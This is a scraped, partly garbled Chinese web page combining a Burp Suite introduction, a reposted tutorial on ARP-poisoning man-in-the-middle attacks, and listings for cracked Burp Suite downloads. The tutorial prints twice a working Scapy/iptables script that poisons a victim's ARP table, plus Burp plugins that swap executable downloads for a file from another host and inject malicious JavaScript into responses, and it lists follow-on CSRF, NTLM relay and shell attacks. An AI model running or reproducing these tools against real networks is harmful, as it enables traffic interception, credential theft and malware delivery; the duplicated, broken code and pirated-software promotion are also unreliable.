您所在的位置： &
Burp Suite：Web应用程序攻击集成平台
Burp Suite：Web应用程序攻击集成平台
Burp Suite是一个Web应用程序集成攻击平台，它包含了一系列burp工具，这些工具之间有大量接口可以互相通信，之所以这样设计的目的是为了促进和提高整个攻击的效率。
Burp Suite是一个Web应用程序集成攻击平台，它包含了一系列burp工具，这些工具之间有大量接口可以互相通信，之所以这样设计的目的是为了促进和提高整个攻击的效率。平台中所有工具共享同一robust框架，以便统一处理HTTP请求，持久性，认证，上游代理，日志记录，报警和可扩展性。 Burp Suite允许攻击者结合手工和自动技术去枚举、分析、攻击Web应用程序。这些不同的burp工具通过协同工作，有效的分享信息，支持以某种工具中的信息为基础供另一种工具使用的方式发起攻击。该程序使用Java写成，需要JRE 1.4 以上版本。
下载链接：
部分功能简介
在本地架设代理服务器以截获并修改浏览器发出的请求。默认设置为 127.0.0.1:8080。使用时只要将浏览器的代理服务器设置为 127.0.0.1:8080，burp proxy就会截获到浏览器发出的请求，并可方便地进行修改之后再向原网站发出，以达到篡改cookie、URL、form等目的。
将浏览器的代理服务器设置为 localhost:8080，然后访问任意一个网站。burp proxy即可截获到该请求。你可以方便地编辑该请求的内容，然后按Forward按钮将编辑之后的请求发到原网站；或者按Drop按钮丢弃该请求。
burp repeater可以将同样的请求多次发送。你可以不断地修改请求的各种参数并发送，以寻找最好的攻击方法。
【责任编辑： TEL：（010）】
关于&&的更多文章
为更好地应对互联网安全挑战，交流最新的安全技术与解决方案，国
一石掀起千层浪，众多APP被“XcodeGhost”木马感染。
为更好地应对互联网安全挑战，交流最新的安全技术与解
Blackhat安全技术大会是世界上最好的能够了解未来安全
今天, 组织越来越重视通过大数据技术来获取安全智能。
本书主要以“网管员的成长经历”为线索展开，虚拟出一个“新手”网管员的工作和学习环境，将网管员的成长分为4个阶段，以“网管
51CTO旗下网站Scapy，IPTables，Brupsuite在ARP毒化攻击中的实用性技巧
&ARP毒化攻击是一种比较老的攻击技术，是中间人攻击的一种途径。传统的攻击方法重点在于信息的收集(密码，Cookie，CSRF令牌等等任何信息)。有时这种攻击也用来对付通过SSL协议访问的目标。但是其中一个攻击途径我认为没有引起足够的重视，就是让中间人作为一个活跃的攻击点去攻击在各类Web应用。关于这种技术大部分的内容都能在网络上找到，但是使用的例子我认为都是零散的也不够完整。
在中间建立一个HTTP代理&这个例子中我会用到Backtrack，Scapy和Brup。当然有很多很棒的工具来去实施ARP毒化攻击，像Ettercap和Cain。而直接使用你自己编写的脚本将会使这一过程变得更精确并且更简单明了。 这里有个脚本可以做几件事情。
1）建立iptables来转发除80和443端口之外的所有数据流，并将80和443端口路由到本机。 2）向受害者发送Arp数据包告诉其将攻击主机作为网关。
这个代码非常的直接。使用方法如下python mitm.py -victim=192.168.1.14
from scapy.all import *
import time
import argparse
import sys
def arpPoison(args):
conf.iface= args.iface
pkt = ARP()
pkt.psrc = args.router
pkt.pdst = args.victim
send(pkt, verbose=args.verbose)
time.sleep(args.freq)
except KeyboardInterrupt:
#default just grabs the default route, http://pypi.python.org/pypi/pynetinfo/0.1.9 would be better
#but this just works and people don't have to install external libs
def getDefRoute(args):
data = os.popen(&/sbin/route -n &).readlines()
for line in data:
if line.startswith(&0.0.0.0&) and (args.iface in line):
print &Setting route to the default: & + line.split()[1]
args.router = line.split()[1]
print &Error: unable to find default route&
sys.exit(0)
#default just grabs the default IP, http://pypi.python.org/pypi/pynetinfo/0.1.9 would be better
#but this just works and people don't have to install external libs
def getDefIP(args):
data = os.popen(&/sbin/ifconfig & + args.iface).readlines()
for line in data:
if line.strip().startswith(&inet addr&):
args.proxy = line.split(&:&)[1].split()[0]
print &setting proxy to: & + args.proxy
print &Error: unable to find default IP&
sys.exit(0)
def fwconf(args):
#write appropriate kernel config settings
f = open(&/proc/sys/net/ipv4/ip_forward&, &w&)
f.write('1')
f = open(&/proc/sys/net/ipv4/conf/& + args.iface + &/send_redirects&, &w&)
f.write('0')
#iptables stuff
os.system(&/sbin/iptables --flush&)
os.system(&/sbin/iptables -t nat --flush&)
os.system(&/sbin/iptables --zero&)
os.system(&/sbin/iptables -A FORWARD --in-interface & +
args.iface + & -j ACCEPT&)
os.system(&/sbin/iptables -t nat --append POSTROUTING --out-interface & + args.iface + & -j MASQUERADE&)
#forward 80,443 to our proxy
for port in args.ports.split(&,&):
os.system(&/sbin/iptables -t nat -A PREROUTING -p tcp --dport & + port + & --jump DNAT --to-destination & + args.proxy)
parser = argparse.ArgumentParser()
parser.add_argument('--victim', required=True, help=&victim IP&)
parser.add_argument('--router', default=None)
parser.add_argument('--iface', default='eth1')
parser.add_argument('--fwconf', type=bool, default=True, help=&Try to auto configure firewall&)
parser.add_argument('--freq', type=float, default=5.0, help=&frequency to send packets, in seconds&)
parser.add_argument('--ports', default=&80,443&, help=&comma seperated list of ports to forward to proxy&)
parser.add_argument('--proxy', default=None)
parser.add_argument('--verbose', type=bool, default=True)
args = parser.parse_args()
#set default args
if args.router == None:
getDefRoute(args)
if args.proxy == None:
getDefIP(args)
#do iptables rules
if args.fwconf:
fwconf(args)
arpPoison(args)[1]&&&&&
【声明】:黑吧安全网()登载此文出于传递更多信息之目的，并不代表本站赞同其观点和对其真实性负责，仅适于网络安全技术爱好者学习研究使用，学习中请遵循国家相关法律法规。如有问题请联系我们，联系邮箱，我们会在最短的时间内进行处理。
上一篇：【】【】渗透神器 Brup Suite（破解版） - 下载频道
- CSDN.NET
&&&&渗透神器 Brup Suite（破解版）
渗透神器 Brup Suite（破解版）
Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具，并为这些工具设计了许多接口，以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息，持久性，认证，代理，日志，警报的一个强大的可扩展的框架。
若举报审核通过，可奖励20下载分
被举报人：
举报的资源分：
请选择类型
资源无法下载
资源无法使用
标题与实际内容不符
含有危害国家安全内容
含有反动色情等内容
含广告内容
版权问题，侵犯个人或公司的版权
*详细原因：
您可能还需要
网络技术下载排行Scapy，IPTables，Brupsuite在ARP毒化攻击中的实用性技巧
是一种比较老的攻击技术，是中间人攻击的一种途径。传统的攻击方法重点在于信息的收集(密码，Cookie，CSRF令牌等等任何信息)。有时这种攻击也用来对付通过SSL协议访问的目标。但是其中一个攻击途径我认为没有引起足够的重视，就是让中间人作为一个活跃的攻击点去攻击在各类Web应用。关于这种技术大部分的内容都能在网络上找到，但是使用的例子我认为都是零散的也不够完整。
在中间建立一个HTTP代理这个例子中我会用到Backtrack，Scapy和Brup。当然有很多很棒的工具来去实施ARP毒化攻击，像Ettercap和Cain。而直接使用你自己编写的脚本将会使这一过程变得更精确并且更简单明了。这里有个脚本可以做几件事情。
1）建立iptables来转发除80和443端口之外的所有数据流，并将80和443端口路由到本机。
2）向受害者发送Arp数据包告诉其将攻击主机作为网关。
这个代码非常的直接。使用方法如下python mitm.py
-victim=192.168.1.14
from scapy.all import *
import time
import argparse
import sys
def arpPoison(args):
conf.iface= args.iface
& pkt.psrc = args.router
& pkt.pdst = args.victim
send(pkt, verbose=args.verbose)
time.sleep(args.freq)
& except KeyboardInterrupt:
#default just grabs the default route,
http://pypi.python.org/pypi/pynetinfo/0.1.9 would be
#but this just works and people don't have to
install external libs
def getDefRoute(args):
= os.popen("/sbin/route -n ").readlines()
& for line in data:
if line.startswith("0.0.0.0") and (args.iface in line):
print "Setting route to the default: "
+ line.split()[1]
args.router = line.split()[1]
& print "Error: unable to find default route"
& sys.exit(0)
#default just grabs the default IP,
http://pypi.python.org/pypi/pynetinfo/0.1.9 would be
#but this just works and people don't have to
install external libs
def getDefIP(args):
= os.popen("/sbin/ifconfig " + args.iface).readlines()
& for line in data:
if line.strip().startswith("inet addr"):
args.proxy = line.split(":")[1].split()[0]
print "setting proxy to: " + args.proxy
& print "Error: unable to find default IP"
& sys.exit(0)
def fwconf(args):
& #write appropriate kernel config
& f = open("/proc/sys/net/ipv4/ip_forward", "w")
& f.write('1')
& f.close()
& f = open("/proc/sys/net/ipv4/conf/" + args.iface + "/send_redirects", "w")
& f.write('0')
& f.close()
& #iptables stuff
& os.system("/sbin/iptables --flush")
& os.system("/sbin/iptables -t nat --flush")
& os.system("/sbin/iptables --zero")
& os.system("/sbin/iptables -A FORWARD --in-interface "
args.iface + " -j ACCEPT")
& os.system("/sbin/iptables -t nat --append POSTROUTING
--out-interface " + args.iface + " -j MASQUERADE")
& #forward 80,443 to our proxy
& for port in args.ports.split(","):
os.system("/sbin/iptables -t nat -A PREROUTING -p tcp
--dport " + port + " --jump DNAT --to-destination "
+ args.proxy)
parser = argparse.ArgumentParser()
parser.add_argument('--victim', required=True, help="victim IP")
parser.add_argument('--router', default=None)
parser.add_argument('--iface', default='eth1')
parser.add_argument('--fwconf', type=bool, default=True, help="Try to auto configure firewall")
parser.add_argument('--freq', type=float, default=5.0, help="frequency to send packets, in
parser.add_argument('--ports', default="80,443", help="comma seperated list of ports to forward to
parser.add_argument('--proxy', default=None)
parser.add_argument('--verbose', type=bool, default=True)
args = parser.parse_args()
#set default args
if args.router == None:
getDefRoute(args)
if args.proxy == None:
getDefIP(args)
#do iptables rules
if args.fwconf:
fwconf(args)
arpPoison(args)
你可以首先使用arp -a
来查看受害者机器上的arp表。在我这里192.168.1.1是我将要欺骗的网关。
当上面的脚本运行之后，arp表将会变为攻击者控制的“代理机”。在这个例子中，能够很容易看到合法的网关的MAC
00:25:9c:4d:b3:cc已经被替换成我们攻击者主机的MAC00:0c:29:8c:c1:d8。
在这种情况下，所有的数据流都将路由我们的主机，并且我们的iptable已经配置成将所有80和443端口的数据流发送到我们的代理中。你的代理需要设置成监听所有接口并设置成不可见模式。
你应该能够看到访问受害者主机的HTTP和HTTPS流量都被路由到了我们的主机并通过Brup监听到了。其他端口的流量将会不经修改的通过我们的主机。
替换HTTP下载文件这非常普遍，即使是世界上最安全的一些组织，也会允许通过HTTP下载文件。你完全不必苦苦寻找那些通过未加密途径提供文件下载的Web应用。FireFox就提供了这样一个机会。这里我举一个比较坑爹的例子，我通过Brup的插件来探测用户是否在尝试下载Firefox浏览器，然后将其替换为Chrome的安装包。这里我并不是想指出Mozilla有什么问题&99%在互联网上的可执行程序都是通过HTTP协议来下载的。这个Brup插件可以在这里下载：，非常棒的一个脚本。这也是我第一次使用他。
from gds.burp.api import IProxyRequestHandler
from gds.burp.core import Component, implements
class ExamplePlugin(Component):
implements(IProxyRequestHandler)
def processRequest(self, request):
if "Firefox Setup " in request.url.geturl() and ".exe" in request.url.geturl():
&&&&&&&&&&&
print "Firefox download detected,
redirecting"
&&&&&&&&&&&
request.host = "131.107.39.100"
&&&&&&&&&&&
request.raw = ("GET /downloads/Firefox Setup 13.0.1.exe
HTTP/1.1\r\n" +
&&&&&&&&&&&&&&&
"HOST: 131.107.39.100\r\n\r\n")
HTTP下载文件欺骗DEMO[翻墙]:
客户端攻击基于中间人的客户端攻击将变得非常有趣，但是其特点就是这些攻击场景并不是一直有效的。下面列举了一些并不是非常全面的攻击途径。
1: 针对任意HTTP站点进行XSS跨站脚本攻击，当Cookie不安全的时候也可以和HTTPS进行交互。
2:&篡改Cookie成为可能：当CSRF保护措施将一个POST提交的值和Cookie进行对比时，这时候你可以设置Cookie来进行CSRF，即使目标只能HTTPS访问也可以这样攻击。
3:&可以在域中进行NTLM重放攻击。
4: 如果Web应用中已经存在XSS，你可以强制受害者访问这些请求而不用说服他们去点击什么连接。这针对内部攻击将非常有效，比如这些，可以让我们获得一个shell。使用和上面一样的方法，我们写一个Brup插件用来向HTTP的响应中插入恶意Javascript代码。
def processResponse(self, request):
#very sloppy way to call only once, forcing
exception on the first call
self.attack += 1
script = "&&&&&&&
#simply inject into the first we see
if "" in request.response.raw:
&&&&&&&&&&&
print "Beginning Injection..."
&&&&&&&&&&&
print type(request.response.raw)
&&&&&&&&&&&
request.response.raw = request.response.raw.replace("", script + "", 1)
&&&&&&&&&&&
#self.attack = 1
MITM XSS DEMO[翻墙]:&
使用HTTPS，昂贵的交换机或者静态端口会不会解决这些问题呢？你可以仅仅通过ARP毒化来控制整个内部网络么？而NTLM重放攻击其实是非常致命的，我将在之后的几个星期继续讨论这个问题，一次将在工作中，一次会在。中间人攻击提供了多种多样的攻击方式，更多的内容敬请期待。
已投稿到：
以上网友发言只代表其个人观点，不代表新浪网的观点或立场。绿色破解专家版BrupSuite1.6.rar - 下载频道
- CSDN.NET
&&&&绿色破解专家版BrupSuite1.6.rar
绿色破解专家版BrupSuite1.6.rar
BrupSuite1.6.rar，绿色，已破解，专家。您值得拥有。
若举报审核通过，可奖励20下载分
被举报人：
xihuanqiqi
举报的资源分：
请选择类型
资源无法下载
资源无法使用
标题与实际内容不符
含有危害国家安全内容
含有反动色情等内容
含广告内容
版权问题，侵犯个人或公司的版权
*详细原因：
您可能还需要
安全技术下载排行